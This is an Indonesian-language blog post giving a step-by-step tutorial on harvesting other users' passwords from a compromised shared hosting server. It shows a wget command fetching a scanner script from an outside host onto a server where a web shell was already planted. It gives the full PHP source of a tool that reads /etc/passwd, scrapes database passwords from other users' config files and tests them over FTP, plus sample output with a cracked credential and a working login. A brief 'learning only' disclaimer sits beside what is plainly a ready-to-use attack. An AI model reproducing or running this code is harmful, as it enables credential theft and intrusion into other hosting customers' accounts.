"….NEON…."

.: BissmillaH :.

Mendapatkan Password User menggunakan Config Scanner

Dalam artikel ini kita akan mencoba mencari dan mendapatkan password dari user yang berada pada suatu hosting server, dengan bermodalkan shell hasil injectan kita, sapa tau kita bisa mendapatkan password sebenarnya dari user tersebut.

CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel ini, semuanya hanyalah untuk proses pembelajaran

Ok, tanpa basa-basi saya mulai saja.

Yang perlu di persiapkan :

1. Seperti biasa, komputer yang terkoneksi ke internet.

2. Shell atau website hasil injectan kita. ( saya anggap rekan-rekan sudah tau gimana cara mendapatkannya )

3. Source untuk Scan file-file configurasi yang memuat informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt

4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh

Praktek :

1. Buka Shell atau website injectan anda, ( catatan : file ini harus di upload ke dalam server yang akan kita scan user nya )

Contoh :

http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php

( sebelumnya saya sudah upload phpshell ke dalam server tersebut )

2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt ( file ini bisa berada dimana saja dalam server target, tentunya dalam folder yang mempunyai permission terhadap user yang kita gunakan skarang )

wget http://wawan.22web.net/download/sConfig.txt

##########################################################

wget wawan.22web.net/download/sConfig.txt

–03:59:52– http://wawan.22web.net/download/sConfig.txt

=> `sConfig.txt’

Resolving wawan.22web.net… done.

Connecting to wawan.22web.net[209.51.196.242]:80…

connected.

HTTP request sent, awaiting response… 200 OK

Length: unspecified [text/plain]

0K …..

184.39 KB/s

03:59:52 (184.39 KB/s) – `sConfig.txt’ saved [6042] #######################################################

Setelah sukses men-download file sConfig.txt, rename file tersebut menjadi sConfig.php ( source codenya dalam bentuk PHP )

3. Jalankan file tersebut,

php sConfig.php

######################################################

mv sConfig.txt sConfig.php

php sConfig.php

Content-type: text/html

X-Powered-By: PHP/4.3.10

Cyberbox

[+] Founded 224 entrys in /etc/passwd [+] Founded 224 readable public_html directories [~] Searching for passwords in config.* files…

[+] /home/bavmus/public_html/main/include/config.php

dbbavas

[+]

/home/business/public_html/LINKEXCHANGE/siteadmin/config.php

…………………….

…………………….

[+] /home/etnkyus/public_html/config.php

133798

[FTP] etnkyus:133798 Success

…………………..

#######################################################

Bingoo !!!, kita sudah mendapatkan 1 dari sekian banyak user yang ada dalam server tersebut. selanjutnya kita coba connect ke server itu dengan user dan password yang telah kita dapatkan tadi..

#######################################################

ftp> open

To xx.xx.xx.250

Connected to xx.xx.xx.250.

220———- Welcome to Pure-FTPd [TLS] ———- 220-You are user number 1 of 50 allowed.

220-Local time is now 04:19. Server port: 21.

220 You will be disconnected after 15 minutes of inactivity.

User (xx.xxx.xx.250none)): etnkyus

331 User etnkyus OK. Password required

Password:

230-User etnkyus has group access to: etnkyus 230 OK. Current restricted directory is /

ftp>

######################################################

ada kemungkinan user dan password yang sama di gunakan dalam Cpanel website tersebut, so, silahkan dicoba sendiri.

Demikian Artikel singkat saya, semoga bermanfaat, Terus Mencoba, dan jangan takut gagal.

script dalam sConfig.txt:

<?php
echo “”;
echo “Cyberbox”;

set_time_limit(0);
##################
@$passwd=fopen(‘/etc/passwd’,’r’);
if (!$passwd) {
echo “[-] Error : coudn’t read /etc/passwd”;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,”:”);
$username=substr($str,0,$pos);
$dirz=”/home/$username/public_html/”;
if (($username!=””)) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################

#########################
echo “

“;
echo “”;

echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;
echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;

echo “[~] Searching for passwords in config.* files…\n\n”;
foreach ($users as $user) {
$path=”/home/$user/public_html/”;
read_dir($path,$user);
}

echo “\n[+] Done\n”;

function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath=”$path$file”;
if (($file!=’.’) and ($file!=’..’)) {
if (is_readable($fpath)) {
$dr=”$fpath/”;
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or
($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’db_connect.php’)) {
$pass=get_pass($fpath);
if ($pass!=”) {
echo “[+] $fpath\n$pass\n”;
ftp_check($username,$pass);
}
}
}
}
}
}
}
}

function get_pass($link) {
@$config=fopen($link,’r’);
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {
if (strrpos($line,’”‘))
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,’”‘)-(strpos($line,’=’)+3)));
else
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));
return $pass;
}
}
}

function ftp_check($login,$pass) {
@$ftp=ftp_connect(’127.0.0.1′);
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo ‘[FTP] ‘.$login.’:’.$pass.” Success\n”;
}
else ftp_quit($ftp);
}
}

echo “
“;

echo “”;
?>

 

16 Maret 2011 - Posted by | Uncategorized

Belum ada komentar.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: